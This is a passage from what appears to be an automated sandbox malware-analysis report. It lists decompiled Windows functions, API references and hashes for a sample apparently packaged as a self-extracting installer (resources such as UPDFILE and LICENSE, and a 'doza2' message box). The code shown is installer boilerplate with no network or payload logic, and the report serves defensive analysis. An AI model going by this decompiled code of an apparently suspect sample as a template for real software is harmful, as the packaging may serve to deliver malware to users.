					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00306CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x003043d0
0x003043d8
0x003043df
0x003043e6
0x003043ec
0x003043f1
0x00304400
0x00304403
0x0030440b
0x00304420
0x00304429
0x00304437
0x00304444
0x00304447
0x0030444d
0x00304454
0x0030445b
0x00304460
0x00304461
0x00304467
0x0030446f
0x00304473
0x00304473
0x00304463
0x00304463
0x00304463
0x0030447a
0x00304481
0x00304484
0x0030448a
0x00304492
0x00304496
0x00304496
0x00304486
0x00304486
0x00304486
0x003044b8

APIs

GetWindowRect.USER32(?,?), ref: 003043F1
GetWindowRect.USER32(00000000,?), ref: 0030440B
GetDC.USER32(?), ref: 00304423
GetDeviceCaps.GDI32(00000000,00000008), ref: 0030442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0030443A
ReleaseDC.USER32(?,00000000), ref: 00304447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 003044A2

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 919a961f23d292fbbf98a88eb221f9708d10e1f76ec6a69a4e80b590ef0aaed3
Instruction ID: a451ce01ac6cd6c66ea34e40d02a59252700bc5cd23c91e1b4047e91d6cde045
Opcode Fuzzy Hash: 919a961f23d292fbbf98a88eb221f9708d10e1f76ec6a69a4e80b590ef0aaed3
Instruction Fuzzy Hash: 8C316371E01619AFCB15CFB8DD599EEBBB9EB89310F154169F905F3280DA30AD05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00306298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00306298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x308004; // 0xcd371c79
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0030171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x309124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x30a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0030171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00306CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00306298
0x003062a0
0x003062a7
0x003062ad
0x003062af
0x003062bb
0x003062c3
0x003062c4
0x0030633b
0x0030633b
0x00306345
0x0030634d
0x00000000
0x00000000
0x003062da
0x003062de
0x0030635f
0x00306369
0x003062e0
0x003062e0
0x003062e0
0x003062e3
0x003062e5
0x003062e5
0x003062e8
0x003062e8
0x003062ea
0x003062eb
0x003062ef
0x003062f1
0x003062f3
0x00306302
0x00306308
0x0030630d
0x00306314
0x00306314
0x00306316
0x00306319
0x00306355
0x00306357
0x0030631b
0x0030631b
0x00306331
0x00306334
0x00306339
0x00000000
0x00306339
0x00306319
0x0030636b
0x0030637d
0x0030637d
0x00000000

APIs

Part of subcall function 0030171E: _vsnprintf.MSVCRT ref: 00301750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,003051CA,00000004,00000024,00302F71,?,00000002,00000000), ref: 003062CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,003051CA,00000004,00000024,00302F71,?,00000002,00000000), ref: 003062D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003051CA,00000004,00000024,00302F71,?,00000002,00000000), ref: 0030631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00306345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003051CA,00000004,00000024,00302F71,?,00000002,00000000), ref: 00306357

Strings

UPDFILE%lu, xrefs: 003062B3, 00306329

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: c9ea7f64563a7e03ca41f075be04802a97d97f614f0607d6c3fbfef2d0c38e7a
Instruction ID: 0554ac80e35d3b8bdcad4564c6fb0cc90adb2b6bb089087c30d6ace949dfe9ec
Opcode Fuzzy Hash: c9ea7f64563a7e03ca41f075be04802a97d97f614f0607d6c3fbfef2d0c38e7a
Instruction Fuzzy Hash: 7F213A35A02219ABDB129F64DC669FFBB7CFF44710F00015AF902A3291DB358D118BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00303A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00303A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0030468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x308d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0030468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x308d4c, "<None>") == 0) {
							LocalFree( *0x308d4c);
							L9:
							 *0x309124 = 0;
							return 1;
						}
						_t9 = E00306517(_t19, 0x7d1, 0, E00303100, 0, 0);
						LocalFree( *0x308d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x309124 = 0x800704c7;
						L2:
						return 0;
					}
					E003044B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x308d4c);
					 *0x309124 = 0x80070714;
					goto L2;
				}
				E003044B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x309124 = E00306285();
				goto L2;
			}

0x00303a46
0x00303a57
0x00303a5d
0x00303a63
0x00303a6a
0x00303a91
0x00303a9a
0x00303ad8
0x00303b13
0x00303b19
0x00303b1b
0x00000000
0x00303b21
0x00303ae7
0x00303af4
0x00303afc
0x00000000
0x00000000
0x00303afe
0x00303a87
0x00000000
0x00303a87
0x00303aa8
0x00303ab3
0x00303ab9
0x00000000
0x00303ab9
0x00303a78
0x00303a82
0x00000000

APIs

Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046A0
Part of subcall function 0030468F: SizeofResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046A9
Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046C3
Part of subcall function 0030468F: LoadResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046CC
Part of subcall function 0030468F: LockResource.KERNEL32(00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046D3
Part of subcall function 0030468F: memcpy_s.MSVCRT ref: 003046E5
Part of subcall function 0030468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003046EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00302F64,?,00000002,00000000), ref: 00303A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00303AB3

Part of subcall function 003044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00304518
Part of subcall function 003044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00304554

Part of subcall function 00306285: GetLastError.KERNEL32(00305BBC), ref: 00306285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00303AD0
LocalFree.KERNEL32 ref: 00303B13

Part of subcall function 00306517: FindResourceA.KERNEL32(00300000,000007D6,00000005), ref: 0030652A
Part of subcall function 00306517: LoadResource.KERNEL32(00300000,00000000,?,?,00302EE8,00000000,003019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00306538
Part of subcall function 00306517: DialogBoxIndirectParamA.USER32(00300000,00000000,00000547,003019E0,00000000), ref: 00306557
Part of subcall function 00306517: FreeResource.KERNEL32(00000000,?,?,00302EE8,00000000,003019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00306560

LocalFree.KERNEL32(00000000,00303100,00000000,00000000), ref: 00303AF4

Strings

LICENSE, xrefs: 00303A46
<None>, xrefs: 00303AC5

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: e78862b5fed4a28bfa2bd34c366fc23ccf5622e7058568898180dff406c84274
Instruction ID: 8dda52c48311b055af673dde3e47a0ce959a804bcb6919005cece80bfd38b4f7
Opcode Fuzzy Hash: e78862b5fed4a28bfa2bd34c366fc23ccf5622e7058568898180dff406c84274
Instruction Fuzzy Hash: 4911E970303201ABD727AF36AC39F1779BDDBD9700F10452FB681DA5F1DA7988108660

Uniqueness

Uniqueness Score: -1.00%

Function 003024E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E003024E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x308004; // 0xcd371c79
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0030658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00306CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x003024e0
0x003024eb
0x003024f2
0x003024f7
0x00302504
0x0030250e
0x0030251d
0x0030252c
0x00302541
0x00302546
0x00302553
0x00302555
0x00302555
0x00302546
0x0030256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00302506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0030252C
_lopen.KERNEL32 ref: 0030253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 0030254C
_lclose.KERNEL32(00000000), ref: 00302555

Strings

wininit.ini, xrefs: 00302510

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: a81c73c9cf14fa6c390d3387f656b143dec534f05dd36d66a26c87c87e9aa455
Instruction ID: d16e2dcef49bf7d4943a07f4bd51123eb5a02dfddcd704fb47e34591bf11176f
Opcode Fuzzy Hash: a81c73c9cf14fa6c390d3387f656b143dec534f05dd36d66a26c87c87e9aa455
Instruction Fuzzy Hash: 5D01B5326022286BD7229B65AC2DEDFBB7CDB46750F000156FA49D3190DE748E45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 003036EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E003036EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x308004; // 0xcd371c79
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x308184 = 1;
						 *0x308180 = 1;
						L13:
						 *0x309a40 = _t119;
						L14:
						__eflags =  *0x308a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00302A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00302A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x308a38 & 0x00000001;
											if(( *0x308a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("doza2");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0030681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E003067C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E003028E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x309a40 = _t119;
						 *0x308184 = 1;
						 *0x308180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x309a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x308184 = _t135;
							 *0x308180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E003044B9(0, _t138);
					L66:
					return E00306CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x003036f9
0x00303700
0x0030370c
0x00303716
0x00303718
0x0030371b
0x00303721
0x0030372b
0x0030373d
0x00303745
0x00303746
0x00303746
0x00303749
0x003037ab
0x003037ad
0x003037ae
0x003037b3
0x003037b8
0x003037b8
0x003037bf
0x003037bf
0x003037c5
0x00000000
0x00000000
0x003037cb
0x003037cd
0x00000000
0x00000000
0x003037d5
0x003037db
0x003037e8
0x003037ea
0x003037ea
0x003037ea
0x003037f0
0x003037f6
0x00303805
0x00303817
0x0030382b
0x00303830
0x00303836
0x0030383b
0x0030383d
0x003038eb
0x003038eb
0x003038f2
0x0030390c
0x00303911
0x00303911
0x00303913
0x0030394d
0x0030394d
0x0030394f
0x003038a9
0x003038a9
0x003038b0
0x003038b2
0x003038b9
0x003038bb
0x003038c1
0x00303975
0x003038c7
0x003038de
0x003038e0
0x003038e0
0x0030397b
0x0030397d
0x003039a9
0x0030397f
0x00303982
0x0030398b
0x0030398d
0x0030398f
0x0030399f
0x003039a1
0x00303991
0x00303991
0x00303991
0x0030398f
0x003039af
0x003039b6
0x00303a0f
0x00303a0f
0x00303a11
0x00303a13
0x00303a19
0x00000000
0x003039b8
0x003039b8
0x003039ba
0x00000000
0x00000000
0x003039bc
0x003039bf
0x00000000
0x00000000
0x003039c3
0x003039c9
0x003039ce
0x003039d0
0x003039e3
0x003039e5
0x003039e6
0x003039f1
0x003039f7
0x003039fa
0x00303a01
0x00303a04
0x00000000
0x00000000
0x00303a06
0x00303a09
0x00303a09
0x00303a0b
0x00303a0b
0x00000000
0x00303a09
0x003039fc
0x00000000
0x003039fc
0x003039d3
0x003039d8
0x003039da
0x00000000
0x00000000
0x00000000
0x003039dc
0x003039b6
0x00303955
0x0030395b
0x00000000
0x00000000
0x00303961
0x00303963
0x00000000
0x00000000
0x00303969
0x00303969
0x00000000
0x00303969
0x00303915
0x00303915
0x0030391b
0x0030391f
0x00000000
0x00000000
0x0030392d
0x00303933
0x00303938
0x0030393a
0x00000000
0x00000000
0x00303940
0x00303946
0x0030394b
0x00000000
0x0030394b
0x00000000
0x003038f2
0x00303843
0x00303845
0x00000000
0x00000000
0x0030384b
0x0030384d
0x00303883
0x00303885
0x00000000
0x00000000
0x0030389a
0x0030389e
0x0030389e
0x00000000
0x00000000
0x003038a0
0x003038a0
0x003038a2
0x00000000
0x00000000
0x003038a4
0x00000000
0x003038a4
0x0030384f
0x00303851
0x00303857
0x0030386e
0x00303877
0x0030387b
0x00000000
0x00000000
0x00000000
0x00303881
0x00303859
0x0030385c
0x00303862
0x00303866
0x00000000
0x00000000
0x00303868
0x00000000
0x003038f4
0x003038f4
0x003038f5
0x003038fb
0x00303901
0x00303901
0x00000000
0x0030390a
0x0030374b
0x0030374e
0x0030375c
0x00303764
0x00303769
0x0030376e
0x00303771
0x0030379c
0x0030379f
0x00000000
0x00000000
0x003037a3
0x003037a4
0x00000000
0x003037a4
0x00303773
0x00303777
0x00303778
0x0030377f
0x00303781
0x0030378e
0x0030378e
0x00303794
0x00000000
0x00303794
0x00303783
0x00000000
0x00000000
0x00303785
0x0030378c
0x00000000
0x00000000
0x00000000
0x0030378c
0x00303750
0x00000000
0x0030372d
0x0030372d
0x0030396b
0x0030396b
0x0030396c
0x0030396e
0x0030396f
0x00303a1e
0x00303a1e
0x00303a22
0x00303a27
0x00303a3e
0x00303a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00303723
MessageBeep.USER32(00000000), ref: 003039C3
MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 003039F1

Strings

doza2, xrefs: 003039E9, 00303A19
3, xrefs: 00303785

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$doza2
API String ID: 2519184315-2054879145
Opcode ID: f9e482450d617d38a8b3788bf250ce6f3dabf269d3d8f9d466b3611edf8e3ace
Instruction ID: 74e8300bfc33c44040f9beebeb358156c60c23441032b8422a8560eed9a58132
Opcode Fuzzy Hash: f9e482450d617d38a8b3788bf250ce6f3dabf269d3d8f9d466b3611edf8e3ace
Instruction Fuzzy Hash: 4D91C571B032149FDB378B19CC71BEA77ACAB45704F1641AAD9899B2D1DB748F80CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00306517 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00306517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x309a3c; // 0x300000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E003044B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t5 =  &_a16; // 0x302ee8
					_t24 =  *_t5;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x0030651f
0x0030652a
0x00306534
0x0030656b
0x00306577
0x0030657c
0x0030657c
0x00306536
0x0030653e
0x00306542
0x00000000
0x00306544
0x00306547
0x0030654c
0x00306549
0x00306549
0x00306549
0x0030655e
0x00306560
0x00306569
0x00000000
0x00000000
0x00306569
0x00306542
0x00306587

APIs

FindResourceA.KERNEL32(00300000,000007D6,00000005), ref: 0030652A
LoadResource.KERNEL32(00300000,00000000,?,?,00302EE8,00000000,003019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00306538
DialogBoxIndirectParamA.USER32(00300000,00000000,00000547,003019E0,00000000), ref: 00306557
FreeResource.KERNEL32(00000000,?,?,00302EE8,00000000,003019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00306560

Strings

.0, xrefs: 0030657C

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID: .0
API String ID: 1214682469-3387927836
Opcode ID: 6f8f8ef73aa0196835a7ea8ae804cbac3fd1928ca95cc0321723673e24736930
Instruction ID: 9ac296480d1f516e556fabe7253f4e6edc84c644a4c6f05765e49b202f9cfddc
Opcode Fuzzy Hash: 6f8f8ef73aa0196835a7ea8ae804cbac3fd1928ca95cc0321723673e24736930
Instruction Fuzzy Hash: 6201F972102619BBDB125F69AC69EBB7A6CEB8A761F010126FE10E31D4D771CD20C7E1

Uniqueness

Uniqueness Score: -1.00%

